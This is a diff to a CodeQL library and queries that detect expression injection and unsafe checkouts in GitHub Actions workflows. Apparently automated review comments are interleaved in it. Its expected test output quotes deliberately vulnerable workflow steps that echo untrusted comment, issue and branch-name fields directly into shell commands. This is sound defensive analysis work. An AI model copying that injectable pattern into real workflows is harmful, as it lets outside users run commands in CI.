+ )
+ or
+ exists(JobImpl j |
+ j.getStrategy().getMatrixVarExpr(fieldName) = result and
+ j.getAChildNode*() = this
+ )
+ }
+}
diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
index 8cd640ace096..f3785eada37c 100644
--- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
@@ -80,7 +80,7 @@ module Completion {
 }
 module CfgScope {
- abstract class CfgScope extends WorkflowNode { }
+ abstract class CfgScope extends AstNode { }
 class WorkflowScope extends CfgScope instanceof Workflow { }
@@ -215,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy {
 override ControlFlowTree getChildNode(int i) {
 result =
 rank[i](AstNode child, Location l |
- child = super.getAMatrixVar() and l = child.getLocation()
+ child = super.getAMatrixVarExpr() and l = child.getLocation()
 |
 child order by 
@@ -224,15 +224,14 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy {
 }
 }
-private class JobTree extends StandardPreOrderTree instanceof Job {
+private class JobTree extends StandardPreOrderTree instanceof LocalJob {
 override ControlFlowTree getChildNode(int i) {
 result =
 rank[i](AstNode child, Location l |
 (
 child = super.getAStep() or
 child = super.getOutputs() or
- child = super.getStrategy() or
- child = super.getUses()
+ child = super.getStrategy()
 ) and
 l = child.getLocation()
 |
@@ -261,7 +260,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run {
 override ControlFlowTree getChildNode(int i) {
 result =
 rank[i](AstNode child, Location l |
- (child = super.getInScopeEnvVarExpr(_) or child = super.getScript()) and
+ (child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr()) and
 l = child.getLocation()
 |
 child
@@ -271,10 +270,10 @@ private class RunTree extends StandardPreOrderTree instanceof Run {
 }
 }
-private class StringValueTree extends StandardPreOrderTree instanceof StringValue {
+private class ScalarValueTree extends StandardPreOrderTree instanceof ScalarValue {
 override ControlFlowTree getChildNode(int i) {
 result =
- rank[i](ExpressionNode child, Location l |
+ rank[i](Expression child, Location l |
 child = super.getAChildNode() and
 l = child.getLocation()
 |
@@ -289,6 +288,6 @@ private class UsesLeaf extends LeafTree instanceof Uses { }
 private class InputTree extends LeafTree instanceof Input { }
-private class StringValueLeaf extends LeafTree instanceof StringValue { }
+private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { }
-private class ExpressionLeaf extends LeafTree instanceof ExpressionNode { }
+private class ExpressionLeaf extends LeafTree instanceof Expression { }
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
index 7cfde2a6f9ff..fddf537ed1df 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll
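Review bot: Binding `JobTree` to `LocalJob` and dropping the `super.getUses()` child leaves a `uses:` job with no tree for its `with:` argument expressions; the same patch defines `ExternalJobImpl extends JobImpl, UsesImpl` with `getArgumentExpr(string key)` and its `getAChildNode` override commented out, and the context at the `@@ -289` hunk shows `UsesLeaf extends LeafTree instanceof Uses`, so such a job presumably ends up as a leaf. If local flow steps are scoped by CFG as the DataFlowPrivate comment in this patch states, flow into the inputs of a reusable-workflow call would then be lost, which is the case the `needs`-context target in `NeedsExpressionImpl` is trying to serve. Either add a comment on `JobTree` stating that external jobs are intentionally leaves, or give them a tree whose children are `super.getArgumentExpr(_)`. The `getChildNode` body continues past the hunk.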
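Review bot: The accessor introduced on the `+` line of the `RunTree` hunk, `getAnScriptExpr()`, breaks the library's own naming pattern (`getAStep`, `getAnOutputExpr`, `getAMatrixVarExpr` elsewhere in this patch): the article before `Script` should be `A`, so `getAScriptExpr()`. The name is defined in `RunImpl` in Actions.qll and already used by the four `ExpressionInjectionSink` copies in CompositeActionsSinks.ql, ReusableWorkflowsSinks.ql, CriticalExpressionInjection.ql and ExpressionInjection.ql, so renaming is cheapest in this commit before it spreads further. The enclosing `getChildNode` starts inside the hunk but its `order by` clause lies outside it.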
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
@@ -38,7 +38,7 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data
 c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and
 r.getInScopeEnvVarExpr(varName) = pred.asExpr() and
 exists(string script, string line |
- script = r.getScript().getValue() and
+ script = r.getScript() and
 line = script.splitAt("\n") and
 (
 output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index 65e2abaa6c64..52c2ae6a4833 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -243,7 +243,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) {
 /**
 * Holds if there is a local flow step from `nodeFrom` to `nodeTo`.
 * For Actions, we dont need SSA nodes since it should be already in SSA form
- * Local flow steps are always between two nodes in the same Cfg scope (job definition).
+ * Local flow steps are always between two nodes in the same Cfg scope.
 */
 pragma[nomagic]
 predicate localFlowStep(Node nodeFrom, Node nodeTo) {
diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml
index df5b1f70ae56..2ed2e03a34e7 100644
--- a/ql/lib/ext/actions_github-script.model.yml
+++ b/ql/lib/ext/actions_github-script.model.yml
@@ -4,6 +4,3 @@ extensions:
 extensible: sinkModel
 data:
 - ["actions/github-script","*","input.script","expression-injection"]
-
-
-
diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql
index fbdf9ca7daa4..fb31fe209902 100644
--- a/ql/src/Debug/partial.ql
+++ b/ql/src/Debug/partial.ql
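Review bot: The context line right after the changed one, `output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1)`, uses a greedy `(.*)`, so a script line whose value itself contains `::` (for example `::set-output name=foo::a::b`) captures `foo::a` as the output name and the store step then writes a field that no later `steps.<id>.outputs.<name>` read will match, silently dropping the flow. Pinning the capture to the name, `output = line.regexpCapture(".*::set-output\\s+name=([^:]*)::.*", 1) or`, avoids that. The predicate `runEnvToScriptStoreStep` starts before the hunk and the alternation continues after it, so I cannot tell from here whether the `$GITHUB_OUTPUT` form that replaced `::set-output` is also modelled below.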
@@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
 source instanceof RemoteFlowSource and
- source.getLocation().getFile().getBaseName() = "argus_case_study.yml"
+ source.getLocation().getFile().getBaseName() = "test.yml"
 }
 predicate isSink(DataFlow::Node sink) { none() }
diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql
index 096c19b48d04..1f90efa5bcc9 100644
--- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql
+++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql
@@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow
 private class ExpressionInjectionSink extends DataFlow::Node {
 ExpressionInjectionSink() {
- exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or
+ exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
 externallyDefinedSink(this, "expression-injection")
 }
 }
diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
index 040251045c87..d84566dab046 100644
--- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
+++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
@@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow
 private class ExpressionInjectionSink extends DataFlow::Node {
 ExpressionInjectionSink() {
- exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or
+ exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
 externallyDefinedSink(this, "expression-injection")
 }
 }
diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
index 590660ce63b1..fd4f03e1edd8 100644
--- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
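Review bot: The private class `ExpressionInjectionSink` edited in CompositeActionsSinks.ql is the same definition this patch edits again in ReusableWorkflowsSinks.ql on this line and in CriticalExpressionInjection.ql and ExpressionInjection.ql on the next; four copies that must stay in lock-step is exactly why the `getScript().getAnExpression()` to `getAnScriptExpr()` rename became a four-file change, and a future copy that is missed would silently have a different sink set. Since every copy already imports `codeql.actions.dataflow.ExternalFlow` for `externallyDefinedSink`, the class can live next to it in the library and be imported by the queries, so the sink definition is single-sourced. The class also has no doc comment; `/** A `${{ }}` expression inside a `run:` script, or an externally modelled sink, into which untrusted input must not flow. */` would state its contract.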
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow
 private class ExpressionInjectionSink extends DataFlow::Node {
 ExpressionInjectionSink() {
- exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or
+ exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
 externallyDefinedSink(this, "expression-injection")
 }
 }
@@ -44,4 +44,4 @@ where
 .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
 select sink.getNode(), source, sink,
 "Potential expression injection in $@, which may be controlled by an external user.", sink,
- sink.getNode().asExpr().(ExpressionNode).getExpression()
+ sink.getNode().asExpr().(Expression).getExpression()
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index 0d0bb39c41ea..d59cc07cad26 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow
 private class ExpressionInjectionSink extends DataFlow::Node {
 ExpressionInjectionSink() {
- exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or
+ exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
 externallyDefinedSink(this, "expression-injection")
 }
 }
@@ -38,4 +38,4 @@ from MyFlow::PathNode source, MyFlow::PathNode sink
 where MyFlow::flowPath(source, sink)
 select sink.getNode(), source, sink,
 "Potential expression injection in $@, which may be controlled by an external user.", sink,
- sink.getNode().asExpr().(ExpressionNode).getRawExpression()
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql
index db341e0c5ccc..865169b3cd94 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql
@@ -19,7 +19,10 @@ import actions
 * An If node that contains an `actor` check
 */
 class ActorCheck extends If {
- ActorCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") }
+ ActorCheck() {
+ this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or
+ this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*")
+ }
 }
 /**
@@ -32,7 +35,7 @@ class LabelCheck extends If {
 }
 }
-from Workflow w, Job job, UsesStep checkoutStep
+from Workflow w, LocalJob job, UsesStep checkoutStep
 where
 w.hasTriggerEvent("pull_request_target") and
 w.getAJob() = job and
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index ca481768671c..4ef2a2e58755 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
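Review bot: Both `regexpMatch` calls in the new `ActorCheck` body accept any `if:` condition that merely mentions `github.actor`, `github.triggering_actor` or `github.event.pull_request.user.login`, regardless of the operator or the value it is compared with, so a condition that excludes a single bot account or only reads the actor for logging also counts as a guard and suppresses the alert; the class is therefore an over-approximate sanitizer that trades false positives for false negatives. If that trade-off is intended, the doc comment above the class should say so, e.g. `* An If node that mentions the actor or the PR author. Any mention counts as a check, whatever it is compared against, so this can mask an unsafe checkout.`. The two alternatives can also be folded into one pattern, `.*github\\.((triggering_)?actor|event\\.pull_request\\.user\\.login).*`, keeping the list of recognised fields in one place.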
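Review bot: Restricting `job` to `LocalJob` on the `+` line of the `from` clause means a `pull_request_target` workflow whose job is a `uses:` call to a reusable workflow is never examined, although the checkout then happens inside the callee under the caller's trigger and permissions. That limitation is not visible to a user of the query, so it is worth a comment before the `from` line, e.g. `// Only jobs with inline steps are inspected; jobs that call a reusable workflow are out of scope.`. The `where` clause continues past the hunk, so I cannot see from here how `checkoutStep` is tied to `job`.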
@@ -1,110 +1,21 @@ files | .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -yamlNodes -| .github/workflows/expression_nodes.yml:1:1:1:2 | on | +workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | -| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | -| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | -| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | -| .github/workflows/expression_nodes.yml:5:5:21:47 | runs-on ... -latest | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | -| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | -| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:7:9:7:11 | run | -| .github/workflows/expression_nodes.yml:7:9:8:6 | run: LI ... ody }}' | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | -| .github/workflows/expression_nodes.yml:8:9:8:11 | run | -| .github/workflows/expression_nodes.yml:8:9:10:6 | run: \| | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:10:11 | run | -| .github/workflows/expression_nodes.yml:10:9:13:6 | run: \| | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:13:11 | run | -| .github/workflows/expression_nodes.yml:13:9:16:6 | run: > | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:16:11 | run | -| .github/workflows/expression_nodes.yml:16:9:20:6 | run: \| | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:20:11 | run | -| .github/workflows/expression_nodes.yml:20:9:21:47 | run: "L ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/test.yml:1:1:1:2 | on | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:3:1:3:4 | jobs | -| .github/workflows/test.yml:4:3:4:6 | job1 | -| .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:5:5:5:11 | runs-on | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | -| .github/workflows/test.yml:7:5:7:11 | outputs | -| .github/workflows/test.yml:8:7:8:16 | job_output | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:11:9:11:12 | uses | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... 
kout@v4 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | -| .github/workflows/test.yml:12:9:12:12 | with | -| .github/workflows/test.yml:13:11:13:21 | fetch-depth | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:24:13:24 | 0 | -| .github/workflows/test.yml:15:9:15:12 | name | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | -| .github/workflows/test.yml:16:9:16:10 | id | -| .github/workflows/test.yml:16:13:16:18 | source | -| .github/workflows/test.yml:17:9:17:12 | uses | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | -| .github/workflows/test.yml:19:9:19:12 | name | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | -| .github/workflows/test.yml:20:9:20:10 | id | -| .github/workflows/test.yml:20:13:20:16 | step | -| .github/workflows/test.yml:21:9:21:12 | uses | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | -| .github/workflows/test.yml:22:9:22:12 | with | -| .github/workflows/test.yml:23:11:23:16 | source | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:11:24:14 | find | -| .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:25:11:25:17 | replace | -| .github/workflows/test.yml:25:20:25:21 | "" | -| .github/workflows/test.yml:26:9:26:10 | id | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... 
iles }} | -| .github/workflows/test.yml:28:9:28:10 | id | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:31:3:31:6 | job2 | -| .github/workflows/test.yml:32:5:32:11 | runs-on | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | -| .github/workflows/test.yml:34:5:34:6 | if | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:5:36:9 | needs | -| .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:38:5:38:9 | steps | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | -| .github/workflows/test.yml:39:9:39:10 | id | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -jobNodes +reusableWorkflows +compositeActions +jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -stepNodes +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | 
@@ -117,17 +28,17 @@ stepNodes | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runExprNodes +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | 
@@ -142,169 +53,156 @@ runExprNodes | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -allUsesNodes +uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUsesNodes +stepUses | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -jobUsesNodes -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesSteps +usesArgs | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| 
.github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:7:11 | run | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:8:11 | run | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:10:11 | run | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:13:11 | run | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:16:11 | run | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:20:11 | run | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... 
ody }}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... 
iles }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
